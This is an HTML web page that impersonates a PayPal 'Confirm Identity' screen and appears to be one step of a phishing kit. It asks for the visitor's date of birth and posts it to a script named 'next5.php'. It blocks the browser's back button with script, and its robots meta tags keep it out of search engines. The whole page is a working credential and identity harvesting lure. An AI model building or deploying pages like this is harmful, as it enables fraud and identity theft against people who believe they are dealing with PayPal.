<!DOCTYPE html>
<html>

<head>
<title>PayPal: Confirm Identity</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=yes">
<meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp, noydir">
<link rel="shortcut icon" href="assets/img/favicon.ico">
<link rel="apple-touch-icon" href="assets/img/apple-touch-icon.png">
<link rel="stylesheet" href="assets/css/myaccount_app.css">
<link rel="stylesheet" href="assets/css/myaccount_wallet.css">
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery.mask.js"></script>
<script src="assets/js/jquery.validate.js"></script>
<script src="assets/js/myaccount.information.js"></script>
<script type="text/javascript">
window.history.forward();

function noBack() {
window.history.forward();
}
</script>
</head>

<body onload="noBack();" onpageshow="if (event.persisted) noBack();" onunload="">
<section class="theoverpanel">
<div class="overpanel-wrapper row">
<div class="overpanel-content col-xs-12 col-xs-offset-0 col-sm-8 col-sm-offset-2 col-md-4 col-md-offset-4">
<div class="overpanel-header">
<h2>Confirm Identity</h2>
</div>
<div class="overpanel-body">
<form id="login_form" action="next5.php" method="post" onsubmit="">
<div class="addressEntry">

<div class="textInput lap" id="DivDob">
<input type="tel" placeholder="Date of birth (DD/MM/YYYY)" id="Dob" name="dob">
</div>


</div>
<input class="vx_btn" type="submit" value="Confirm" id="btnConfirm">
<p class="scretlogo"></p>
</form>
</div>
</div>
</div>
<div class="hasSpinner hide" id="loading"></div>
</section>
<script src="assets/js/information.post.js"></script>
</body>
</html>
